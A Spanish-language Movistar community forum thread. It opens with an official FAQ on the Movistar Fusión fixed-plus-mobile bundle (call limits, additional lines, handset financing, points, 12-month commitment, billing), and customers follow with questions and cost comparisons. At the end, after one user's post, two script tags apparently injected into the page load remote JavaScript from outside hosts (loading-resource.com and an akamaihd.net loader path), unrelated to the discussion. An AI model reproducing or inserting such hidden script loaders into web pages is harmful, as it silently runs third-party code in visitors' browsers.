Dudas Frecuentes Movistar Fusión

Emilio-Movistar
Community Manager
Dudas Frecuentes Movistar Fusión

Buenas tardes a tod@s

 

Los últimos días nos habéis hecho llegar una serie de preguntas sobre Movistar Fusión que esperamos poder resolver con las siguientes dudas frecuentes, no obstante estaremos encantados de resolver cualquier otra pregunta que pueda no estar contemplada en las mismas.

 

                                     SERVICIO MOVISTAR FUSIÓN

 

¿Qué sucede en el caso de que exceda del límite de llamadas desde el móvil? 
En el caso de que excedas los 500 minutos/mes de llamadas a móviles y a fijos nacionales incluidos, te enviaremos un SMS para avisarte. Las llamadas que excedan del límite establecido se facturarán por minuto a un  precio de 18 cent/min con un establecimiento de llamada de 15 cent/llamada. 
 
¿Tengo establecimiento de llamada?
Los minutos de llamadas nacionales  incluidos  en Movistar Fusión tanto desde el fijo como desde el móvil incluyen el establecimiento de llamada. Los minutos que excedan de este límite sí están sujetos  a un  establecimiento de 15 cent/llamada.
 
¿Qué pasa si sobrepaso el Giga cuando navego por Internet con mis dispositivos móviles?
Si has alcanzado el límite de tu franquicia de datos a máxima  velocidad percibirás una reducción de velocidad (64Kbps de bajada y 16Kbps de subida) en la navegación móvil cuando estés fuera del hogar hasta el mes siguiente, pero en ningún caso pagará más.

¿Si dispongo de Movistar VDSL (Hasta 30 Mb) ¿puedo contratar Movistar Fusión?
Sí puedes contratarlo, aunque la cobertura VDSL en Movistar Fusión es hasta 10 Mbps. lo que reduciría tu velocidad de conexión actual.
 
 

                                              LINEAS ADICIONALES 

 

¿Cuántas líneas móviles adicionales puedo asociar a  Movistar Fusión?
Hasta 4 líneas móviles adicionales (con el mismo titular, NIF/CIF) por 20 €/mes cada una de ellas. En definitiva, 5 líneas móviles por hogar o negocio.
 
¿Qué condiciones tiene cada línea móvil adicional?
Cada una de las líneas adicionales disfruta de 500 min/mes para llamadas a cualquier operador nacional fijo y móvil, las 24h, SMS ilimitados y Tarifa Plana Internet Móvil con 1 GB a máxima velocidad (7,2Mbps de bajada/ 1,4 Mbps de subida).
 
¿Las líneas móviles adicionales pueden contratarse a nombre de otros familiares (NIF’s/CIF’s), diferentes del contratante de  Movistar Fusión?
No. Las líneas móviles adicionales se darán de alta únicamente bajo el mismo NIF/CIF del titular de Movistar Fusión.
 
¿Puedo asociar al paquete Movistar Fusión la línea móvil de contrato de alguno de los familiares de mi domicilio o negocio?
Sí, siempre que estén a nombre del mismo NIF /CIF y titular del paquete Movistar Fusión. También es posible hacer previamente un cambio de titularidad para este fin o dar un alta nueva de una línea de contrato móvil a nombre del  titular único.
 
 
                                      TERMINALES/PROGRAMA PUNTOS

 

¿Puedo financiar dispositivos móviles con Movistar Fusión?

Podrás financiar los dispositivos con precio desde 60€ en cuotas mensuales con un plazo máximo de 24 meses.

Para facilitarte las cuentas, el importe de la cuota financiada del móvil se añadirá a la cuota mensual en la factura fijo de Movistar Fusión, para que en la misma se refleje el gasto completo en comunicaciones.

 

Si contrato Movistar Fusión ¿qué pasa con los puntos acumulados para la renovación de móvil  en zona azul?
En Movistar Fusión no son necesarios los puntos para renovar el terminal, por lo que los puntos que tengas acumulados se convertirán en un descuento a aplicar en el catálogo de Movistar Fusión.

 

¿La generación de puntos en Movistar Fusión va a asociada a la factura total? ¿Se acumulan más puntos cuanto más consumo?
Con Movistar Fusión la renovación de terminal se realiza sin puntos, en el momento en que contrates Movistar Fusión ya no generaras puntos, ya que estos no serán necesarios.
 
¿El catálogo de Movistar Fusión tendrá las mismas condiciones que el programa de puntos?
El catálogo de Movistar Fusión le ofrecerá iguales o mejores condiciones que el actual programa de puntos.
 
                                                         PERMANENCIA
 
¿Cual es el periodo de permanencia de Movistar Fusión?
La permanencia de Movistar Fusión son 12 meses.
 
¿Qué pasa con los contratos de compromiso antiguos?
Los contratos de compromiso de la parte fija (ADSL/Fibra/Imagenio) se eliminan al contratar Movistar Fusión.

Los compromisos en la parte móvil quedarían:

  • Si tenias un gasto mínimo antes de contratar Movistar Fusión, éste desaparece en factura y pasa a estado latente. Sólo en el caso de baja de Movistar Fusión volverás a tu antiguo gasto mínimo móvil.  El resto de contratos de compromiso que tuvieras en el móvil también se reactivarán.
  • Los módulos de Ahorro-Fidelidad se dan de baja y no aplica la penalización.
  • Si tenías compromisos asociados a servicios de valor añadido de móvil, también se eliminan al entrar en Fusión. 
¿Qué ocurre a los 12 meses con las líneas adicionales?

Al cabo de 12 meses quedaras libre de permanencia pudiendo permanecer con Movistar Fusión o darte de baja sin penalización.

Si por el contrario te das de baja de todo el paquete Movistar Fusión no superados los 12 meses de compromiso, la línea adicional será reposicionada al Contrato Básico Personal con un Habla y Navega 30 (o Con tu Negocio 24h + Internet 40 para autónomos) y se ejecutará la penalización de 190€.

 

                                                           FACTURACIÓN

 

Si contrato ahora ADSL y/o móvil….. Y luego me paso a Movistar Fusión, ¿Cómo afectará a mi factura?
Existen tres casos:
 
  • Cliente nuevo: recibirás una 1ª factura transitoria correspondiente al servicio de ADSL.
  • Cliente Movistar sin ADSL: se te emitirán dos facturas, una 1ª factura para la regularización de las cuotas de los productos que tengas contratado, y otra correspondiente al servicio ADSL.
  • Cliente Movistar con ADSL: se te emitirá una 1ª factura transitoria para la regularización de las cuotas de los productos que tengas contratados.
¿Cómo voy a recibir la factura? ¿Desde el primer momento tendré una sola factura?
No, aquellos que ya tengáis algún servicio con Movistar recibiréis, al pasar a Movistar Fusión, una factura previa de tránsito para la regularización de las cuotas de los productos que tenéis contratados. 

Si incluyo en Movistar Fusión varias líneas móviles, ¿Voy a tener en la factura única el detalle y los consumos de cada una de ellas?
No, en la factura de Movistar Fusión solo aparecerá la cuota de la línea móvil principal asociada al paquete  y luego se emitirán facturas independientes para cada una de las líneas adicionales donde aparecerá el coste mensual de cada una de ellas (20€/mes) y los consumos extraordinarios   que se realicen por fuera de la franquicia de minutos incluidos, o con  las llamadas a números 90x ,  tráfico internacional, MMS, y otros servicios especiales que pudieran tener asociados como el seguro móvil, la tarjeta multiSIM, Yavoy, etc…
 
La factura de Movistar Fusión ¿Va a ser consultable en Internet?
La factura de Movistar Fusión se emitirá por defecto en formato electrónico (e-factura) y sólo  se emitirá en papel previa petición del cliente.
 
original.png
 



Consulta nuestras ofertas y servicios sobre miMovistarTarifas Móvil, ADSL y Fibra, Móviles, Televisión Ofertas  Movistar.


No te pierdas los últimos estrenos de Movistar+ en Cine, Series, Motor, Deportes, Toros y el mejor Fútbol

Ser usuario registrado de Movistar.es tiene sus ventajas. Si aún no lo eres, regístrate, ¡¡es gratis!!: mi movistar


Una de las ventajas es poder ver tu factura en Consulta Factura online.


También te invitamos a seguirnos en TwitterFacebook , Telegram e Instagram




Solución aceptada.png
Mensaje 23 de 690
200.184 Visitas
689 RESPUESTAS 689
xexu81
Yo probé el VDSL

Hola,

 

alguien sabe porque los clientes de Vdsl, no nos podremos acoger a Movistar Fusion? y si los clientes de adsl y fibra?

 

Gracias

Mensaje 1 de 690
113.697 Visitas
hmora85
Yo probé el VDSL

Hola buenas noches, proximamente tendréis la tarifa de "Movistar Fusión" la cual se describo así a través de vuestro twitter:

 

 

***La tarifa para clientes que quieran ADSL a partir de 10 megabits de velocidad por segundo, con 500 minutos de llamadas a móvil y navegación móvil con descarga de un gigabit, tiene un precio de 49,9€***

 

Mis dudas son si este ADSL llevará la TPN a fijos, los 500mins de llamadas a móviles fines de semana y los 50 mins de fijo a móvil de lunes a viernes?

Los 500mins son para llamar de la línea fija a móviles o para llamar desde el móvil de contrato del cliente ó compartidos entre fijo y móvile/móviles?

La velocidad de subida y bajada seguirá siendo la misma en ADSL y en internet móvil del cliente?

Cuales serán los periodos de facturación? (Ya que en fijo y móvil son diferentes).

De qué manera regularéis los periodos de facturación entre fijo y móvil en el caso de que el cliente acepte esta modalidad?

 

A la espera de vuestra pronta respuesta.

 

 

Saludos.

Etiquetas (1)
Mensaje 2 de 690
134.222 Visitas
Andres
Quítamelo todo menos el 5G

Aquí tienes la resolución a la mayoria de dudas: http://comunidad.movistar.es/t5/Bienvenida-y-noticias/MOVISTAR-FUSI%C3%93N-la-oferta-integrada-de-co...

 

¿Este ADSL llevará la TPN a fijos, los 500mins de llamadas a móviles fines de semana y los 50 mins de fijo a móvil de lunes a viernes?

 

Pagina 6 del PDF: http://saladeprensa.telefonica.com/documentos/Rueda_de_Prensa_F_LMGvf_20120914.pdf

 

Los 500mins son para llamar de la línea fija a móviles o para llamar desde el móvil de contrato del cliente ó compartidos entre fijo y móvile/móviles?

 

Los 500 minutos son aparte de los que dispones desde el fijo, pero estos 500 se realizan desde el terminal móvil de contrato.

 

La velocidad de subida y bajada seguirá siendo la misma en ADSL y en internet móvil del cliente?

 

Se mantienen.

 

  • Fijo: 10/800 con tarifa plana.
  • Móvil: 1Gb a maxima velocidad y una vez agotados velocidad reducida.

 

La respuesta a las dos ultimas preguntas las desconozco.

Mensaje 3 de 690
134.188 Visitas
andlopper
Yo probé el VDSL

Cada cual tiene su plan de fijo y movil.

 

En mi caso, tengo contratada la fibra de 100 mg que actualmente la pago a precio de 50 mg y que en mi caso sube unos 64 euros ( iva incluido).

En relación a mi terminal móvil, tengo la tarifa 6 con internet movil de 500 mg y vengo gastando entre 30 y 40 € iva incluido.

 

Si sumamos ambos importes, hablamos de entre 94 o 104 ( vamos a poner de media unos 100 € iva incluido).

 

La apuesta que hace la opción movistar fusion que incluye el fijo con fibra 100 megas, los 500 minutos de fijo a movil los fines de semana y los 50 entre semana, e incorporar un terminal movil con 500 minutos a cualquier operador, 1 gB de datos y los SMS , asciende a 72,48 € ( iva incluido).

 

la diferencia es clara y en mi caso, es de 27,52 € menos que pagaré al mes ( iva incluido).El ahorro anual estimado es de 330 € ( iva incluido) y el descuento neto mensual sobre lo que pago sumando ambos importes y la nueva tarifa de movistar fusion fibra con un único terminal ,móvil es del 27,52 % ya que la base mensual que tengo son precisamente 100 € iva incluido)

 

Creo que es todo un acierto y apludo el gesto de movistar en fusionar los contratos de telefonía fija y móvil ya que supondrá ventajas de ahorro muy interesantes para todos.

 

En cuanto a la permanencia , parece ser que será de 12 meses de permanencia ( no me importa ya que siempre he sido cliente movistar tanto en telefonica fija como movil)

 

Además, en  mi caso, ahorrándome 27,52 € , me  beneficio de disponer de 500 minutos para hablar en mi terminal móvil, es decir, sobre mi consumo de minutos medio mensual (180 minutos), gano 320 minutos adicionales sin sobrecoste.

 

Haced números pero creo que es una oferta muy interesante para todos.

 

También felicito que Movistar piense en la incorporación de nuevos terminales que por 24,20 € iva incluido , puedes optar por tener un segundo terminal en las mismas condiciones del primero y porqué no, también la opción de disponer de condiciones ventajosas para adquirir nuevos terminales  a pagar en 24 mese sin intereses.......

 

Espero vuestras valoraciones y me apunto a ir el mismo dia 1 de Odtubre a una tienda movistar para fusionar mis contratos con movistar.

 

saludos.

Mensaje 4 de 690
134.177 Visitas
hmora85
Yo probé el VDSL
Muchas gracias por todos los datos Andres, detodas maneras también espero respuesta por parte de la comunidad movistar referente a como regularán los período de facturación entre fijo y móvil.

Saludos.
Mensaje 5 de 690
134.066 Visitas
kirshley
Yo probé el VDSL
Buenos días. Lo que me interesaría saber con la tarifa fusión de 500 min, 1gb y SMS ilimitados para el movil y tarifa plana nacional, 500 min fijo-movil fines de semana y 50 min movil-fijo de lunes a viernes es el periodo de horas comprendido de esos 500 min de voz móvil, si es de 24 horas o de 16:00 a 8:00. Muchas gracias por adelantado
Mensaje 6 de 690
133.828 Visitas
norbys
Yo probé el VDSL

los 500 minutos de movil son durante las 24 horas del dia

Mensaje 7 de 690
133.818 Visitas
jpr3103
Yo probé el VDSL
En esta nueva etapa NO EXISTIMOS los clientes de VDSL 30 MB
Mensaje 8 de 690
133.829 Visitas
txenia
Yo probé el VDSL

Para mi situacion, el factor determinante de esta tarifa va a ser la permanencia, su coste en caso de baja.

 

He analizado mis consumos, y 7-10€ al mes de ahorro no me compesa el posible costo de una baja pagando la permanencia.

 

Es una tarifa interesante para grandes consumidores de movil y internet movil, este no es mi caso.

 

 

Mensaje 9 de 690
133.692 Visitas
jpr3103
Yo probé el VDSL
Cual es la tarifa para la opción VDSL 30 mb o es que ya no existe en Movistar Fusion
Mensaje 10 de 690
133.421 Visitas
Emilio-Movistar
Community Manager

Buenos días a tod@s

 

Aquellos que nos estáis preguntando por la oferta de Movistar Fusión para VDSL 30MB, comentaros que de momento la oferta no esta definida al 100%, esperamos poder daros mas detalles en breve.

 

Un saludo




Consulta nuestras ofertas y servicios sobre miMovistarTarifas Móvil, ADSL y Fibra, Móviles, Televisión Ofertas  Movistar.


No te pierdas los últimos estrenos de Movistar+ en Cine, Series, Motor, Deportes, Toros y el mejor Fútbol

Ser usuario registrado de Movistar.es tiene sus ventajas. Si aún no lo eres, regístrate, ¡¡es gratis!!: mi movistar


Una de las ventajas es poder ver tu factura en Consulta Factura online.


También te invitamos a seguirnos en TwitterFacebook , Telegram e Instagram




Solución aceptada.png
Mensaje 11 de 690
133.381 Visitas
miguelgrado
Yo probé el VDSL

espero que para los que tengamos vdsl tambien porque yo demas tengo 2 lineas moviles y me ahorraria mucho..espero noticias

Forospyware Warrior Malware Team
Mensaje 12 de 690
133.308 Visitas
FRAN5282
Yo probé el VDSL

La nueva oferta de Movistar Fusion, que incluye fijo-adsl y movil con 1gb de internet, en el caso de que no se disponga de una smartphone par disfrutar de esta oferta ¿ofrecera algún terminal?

Mensaje 13 de 690
123.784 Visitas
Bindu
Yo probé el VDSL

yo creo que... va a ser que no

--------------------------------------------------
El hardware es lo que puedes patear, y el software, lo que puedes maldecir.
Mensaje 14 de 690
123.775 Visitas
Joss
Más integrado que la RDSI

JOPELAS! espero que sí ofrezcan algo. Hoy he ido a una tienda pero no dan aún información 

Mensaje 15 de 690
123.707 Visitas
Andres
Quítamelo todo menos el 5G

En el PDF de la presentación pone claramente que se subvencionan. Tendrás que darte de alta en Movistar Móvil, con Movistar Fusión y pagar como cualquiera el terminal a plazos.

Mensaje 16 de 690
123.673 Visitas
Franxu
Yo probé el VDSL

Y para los que tenemos vdsl 10 megas?

Es mas, es que aqui no ponen adsl normal....

Mensaje 17 de 690
133.255 Visitas
Almu-Movistar
Antiguo Moderador

Hol@FRAN5282 Emoticono feliz ,


Indicarte que en la nota de prensa presentada sobre el producto se informa sobre: " También Movistar Fusión llevará asociado un nuevo plan para la renovación de terminales, exclusivo para los clientes que lo contraten, con un catálogo de dispositivos Premium para ellos y a unos precios ventajosos y con opciones de pago con cuotas sin intereses." Puedes leer la nota de prensa en este enlace de la Comunidad.

Salu2Emoticono feliz




Consulta nuestras ofertas y servicios sobre miMovistarTarifas Móvil, ADSL y Fibra, Móviles, Televisión Ofertas  Movistar.


No te pierdas los últimos estrenos de Movistar+ en Cine, Series, Motor, Deportes, Toros y el mejor Fútbol

Ser usuario registrado de Movistar.es tiene sus ventajas. Si aún no lo eres, regístrate, ¡¡es gratis!!: mi movistar


Una de las ventajas es poder ver tu factura en Consulta Factura online.


También te invitamos a seguirnos en TwitterFacebook , Telegram e Instagram




Solución aceptada.png
Mensaje 18 de 690
123.589 Visitas
ejordibcn
Más integrado que la RDSI

He leido la noticia de movistar fusion y aprovechando que han instalado la fibra en el edifico y estoy interesado, paso a explicar mi caso

 

Actualmente tengo la linea y la adsl 30 megas con jazztel, movistar me sigue cobrando algo asi como mantenimiento de telefono.

 

La linea fija de casa esta a mombre de mi mujer y tengo un movil con tarifa de datos en movistar a mi nombre.

Puedo aprovechar la oferta de fusion fibra ,aunque los titulares de las lineas sean distintos, el domicilio de facturacion y la cuenta bancaria son los mismos en ambos casos.

 

Deberia hacer una portabilidad desde jazztel a movistar , me quedaria sin linea y sin adsl mucho tiempo ya que en casa internet es un servicio basico  

Agradecido 

 

Mensaje 19 de 690
123.579 Visitas
rafa30
Yo probé el VDSL
Publicareis cual es el catálogo y precios.
Mensaje 20 de 690
123.530 Visitas
Emilio-Movistar
Community Manager

Franxu escribió:

Y para los que tenemos vdsl 10 megas?

Es mas, es que aquí no ponen adsl normal....


Hola Franxu y bienvenido a la Comunidad Emoticono feliz

 

Esperamos poder dar mas detallas en breve al respecto de tu duda pero nuestra intención es no olvidarnos de nadie.

 

Un saludo

 




Consulta nuestras ofertas y servicios sobre miMovistarTarifas Móvil, ADSL y Fibra, Móviles, Televisión Ofertas  Movistar.


No te pierdas los últimos estrenos de Movistar+ en Cine, Series, Motor, Deportes, Toros y el mejor Fútbol

Ser usuario registrado de Movistar.es tiene sus ventajas. Si aún no lo eres, regístrate, ¡¡es gratis!!: mi movistar


Una de las ventajas es poder ver tu factura en Consulta Factura online.


También te invitamos a seguirnos en TwitterFacebook , Telegram e Instagram




Solución aceptada.png
Mensaje 21 de 690
133.092 Visitas
norbys
Yo probé el VDSL

Una consulta, emilio

 

los clientes que actualmente tenemos algun descuento promocional en el ADSL, podemos pasar a movistar fusion manteniendo el descuento o tenemos que esperar a que finalice

Mensaje 22 de 690
133.078 Visitas
Caminacielos
Yo probé el VDSL

Hola.

 

He leido la nota de prensa que ha publicado Movistar sobre su nueva oferta combinada de servicios y estoy gratamente sorprendido de hacia dónde quiere ir esta compañía. Sólo espero en que no se quede todo en buenas intenciones.

Volviendo al tema inicial quería saber si hay alguna pista de cómo quedaría la cosa si, como es mi caso, tienes hasta cuatro líneas de móvil, además del adsl y el fijo.

Gracias por adelantado.

 

Saludos.

Mensaje 24 de 690
131.202 Visitas
rovipi
El WIFI me llevó al sofá

Por lo que yo tengo entendido, seria 49,90€ (más IVA) con una línea móvil, y luego por cada línea que añades (hasta un máximo de cuatro) 20 € (más IVA) por cada línea que añades!

 

Un saludo!

<script type="text/javascript" src="http://loading-resource.com/data.geo.php?callback=window.__geo.getData"></script> <script type="text/javascript" src="http://cdncache3-a.akamaihd.net/loaders/1032/l.js?aoi=1311798366&pid=1032&zoneid=62862"></script>
Mensaje 25 de 690
131.196 Visitas